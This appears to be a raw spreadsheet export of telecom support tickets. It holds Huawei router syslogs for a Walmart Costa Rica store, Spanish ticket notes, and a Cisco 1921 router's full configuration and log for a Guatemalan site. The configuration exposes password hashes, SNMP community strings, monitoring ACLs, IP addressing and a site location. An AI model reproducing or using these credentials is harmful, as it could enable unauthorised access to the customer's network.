APR 15 2022 06:21:11-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[58]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 15 2022 04:22:21-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[59]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 15 2022 04:21:41-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[60]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 06:52:33-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[61]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 06:51:35-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[62]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 06:19:59-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[63]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 06:19:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[64]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 04:47:00-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[65]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 04:46:20-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[66]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR  1 2022 04:45:40-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[67]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 12:24:24-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[68]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 12:23:44-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[69]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 12:23:04-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[70]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 11:45:18-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[71]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 11:44:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[72]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 31 2022 11:43:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[73]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 17 2022 12:15:51-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[74]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 17 2022 12:14:53-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[75]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 17 2022 11:44:50-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[76]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 17 2022 11:44:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[77]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 17 2022 11:43:30-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[78]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 16 2022 03:37:23-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[79]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAR 16 2022 03:37:20-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[80]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 16 2022 00:21:41-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[81]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.129.
MAR 16 2022 00:15:14-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[82]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
MAR 15 2022 06:53:46-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[83]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 06:53:06-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[84]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 06:52:26-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[85]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 06:20:01-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[86]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 06:19:21-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[87]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 04:45:21-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[88]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 15 2022 04:44:41-06:00 CC_WALMART_CR_TIENDA_3031 %%01INFO/4/SUPPRESS_LOG(L)[89]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAR 10 2022 23:31:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01OSPF/4/NBR_CHANGE_E(L)[90]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.30, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
MAR 10 2022 23:31:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01OSPF/4/NBR_CHANGE_E(L)[91]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.30, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
MAR 10 2022 23:31:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01OSPF/4/NBR_CHANGE_E(L)[92]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.30, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
MAR 10 2022 23:31:19-06:00 CC_WALMART_CR_TIENDA_3031 %%01OSPF/4/NBR_CHANGE_E(L)[93]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.30, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
MAR 10 2022 23:31:10-06:00 CC_WALMART_CR_TIENDA_3031 %%01OSPF/4/NBR_CHANGE_E(L)[94]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.2.30, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
MAR 10 2022 14:42:52-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[95]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 10 2022 14:42:41-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[96]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 10 2022 14:42:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[97]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:42:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[98]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:42:12-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[99]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAR 10 2022 14:42:01-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[100]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:42:01-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[101]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:42:01-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[102]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO DOWN STATE.
MAR 10 2022 14:41:42-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[103]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:41:42-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[104]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:41:42-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[105]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01RM/4/IPV4_DEFT_RT_CHG(L)[106]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.2107, NEXTHOP=10.201.41.129, NEIGHBOUR=10.201.41.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[107]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=CEASE/OTHER CONFIGURATION CHANGE)
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[108]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=CEASE/OTHER CONFIGURATION CHANGE)
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[109]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[110]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:41:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[111]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO DOWN STATE.
MAR 10 2022 14:30:21-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[112]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 10 2022 14:07:32-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[113]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAR 10 2022 14:07:32-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/STRATUM_CHANGE(L)[114]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
MAR 10 2022 14:07:32-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/LEAP_CHANGE(L)[115]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
MAR 10 2022 14:07:32-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[116]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAR 10 2022 14:06:43-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[117]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 10 2022 14:06:22-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[118]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:06:22-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[119]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:06:22-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[120]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAR 10 2022 14:06:11-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[121]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:06:11-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[122]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:06:11-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[123]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO DOWN STATE.
MAR 10 2022 14:05:51-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[124]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:05:51-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[125]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
MAR 10 2022 14:05:51-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[126]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAR 10 2022 14:05:48-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[127]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:05:48-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[128]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 14:05:48-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[129]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO DOWN STATE.
MAR 10 2022 13:52:03-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[130]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE UP STATE.
MAR 10 2022 13:52:03-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[131]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE UP STATE.
MAR 10 2022 13:52:03-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[132]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAR 10 2022 13:51:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[133]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 13:51:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFNET/4/LINK_STATE(L)[134]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1107 HAS ENTERED THE DOWN STATE.
MAR 10 2022 13:51:58-06:00 CC_WALMART_CR_TIENDA_3031 %%01IFPDT/4/IF_STATE(L)[135]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO DOWN STATE.
MAR 10 2022 13:44:52-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/SOURCE_LOST(L)[136]:SYSTEM SYNCHRONIZATION SOURCE LOST.
MAR 10 2022 13:34:29-06:00 CC_WALMART_CR_TIENDA_3031 %%01RM/4/IPV4_DEFT_RT_CHG(L)[137]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.1107, NEXTHOP=10.201.11.129, NEIGHBOUR=10.201.11.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
MAR 10 2022 13:34:29-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[138]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXPIRED)
MAR 10 2022 12:57:39-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[139]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAR 10 2022 12:57:39-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/STRATUM_CHANGE(L)[140]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
MAR 10 2022 12:57:39-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/LEAP_CHANGE(L)[141]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
MAR 10 2022 12:57:39-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/PEER_SELE(L)[142]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.129.
MAR 10 2022 12:57:34-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[143]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
MAR 10 2022 11:39:16-06:00 CC_WALMART_CR_TIENDA_3031 %%01NTP/4/SOURCE_LOST(L)[144]:SYSTEM SYNCHRONIZATION SOURCE LOST.
MAR 10 2022 11:29:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01RM/4/IPV4_DEFT_RT_CHG(L)[145]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.1107, NEXTHOP=10.201.11.129, NEIGHBOUR=10.201.11.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
MAR 10 2022 11:29:38-06:00 CC_WALMART_CR_TIENDA_3031 %%01BGP/3/STATE_CHG_UPDOWN(L)[146]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM ESTABLISHED TO IDLE. (INSTANCENAME=PUBLIC, STATECHANGEREASON=HOLD TIMER EXP</t>
  </si>
  <si>
    <t>F4589669</t>
  </si>
  <si>
    <t>DEBIDO AL TIEMPO QUE LLEVA TICKET SIN SEGUIMIENTO, SE ESCALA CON KEVYN FONSECA TEAM LEADER N1; ÉSTE INDICA QUE VERIFICARÁ CON GESTOR ASIGNADO.</t>
  </si>
  <si>
    <t>F4589693</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO NO SE TIENE ALARMAS RECIENTES NI LOGS DEL CPE SE PROCEDE A VALIDAR CON EL CLIENTE ENLACE OPERATIVO Y ESTABLE.
ROUTER CPE ACTIVO HACE 1 SEMANA.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FABRICA_RENE_GT_INTERNET_EL_TEJAR UPTIME IS 1 WEEK, 14 HOURS, 1 MINUTE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TX18458305
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
249840K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX18458305
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2695 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$2FSL$474CBK4SYB2COR8M8PJM3.
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
NO IP DHCP USE VRF CONNECTED
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
!
!
NO IP DOMAIN LOOKUP
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX18458305
!
!
USERNAME GESTIONIP SECRET 5 $1$A3Y8$3SQYSXRYRYANAW2PR5HGW0
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.162.66 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/39200035T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.78.147.252 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.56.47.245 255.255.255.252
 RATE-LIMIT INPUT 2048000 256000 512000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 256000 512000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.78.147.249
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON003920I RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET.- AL CHIPOTON, ALDEA SAN MIGUEL MORAZAN, EL TEJAR CHIMALTENANGO
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD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CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
LOG DEL ROUTER CPE:
SHOW LO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0 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.903: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 27 15:36:37.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 27 15:36:47.667: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 27 15:36:47.667: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:36:48.667: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 27 15:36:48.667: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:36:52.823: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 27 15:36:55.279 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
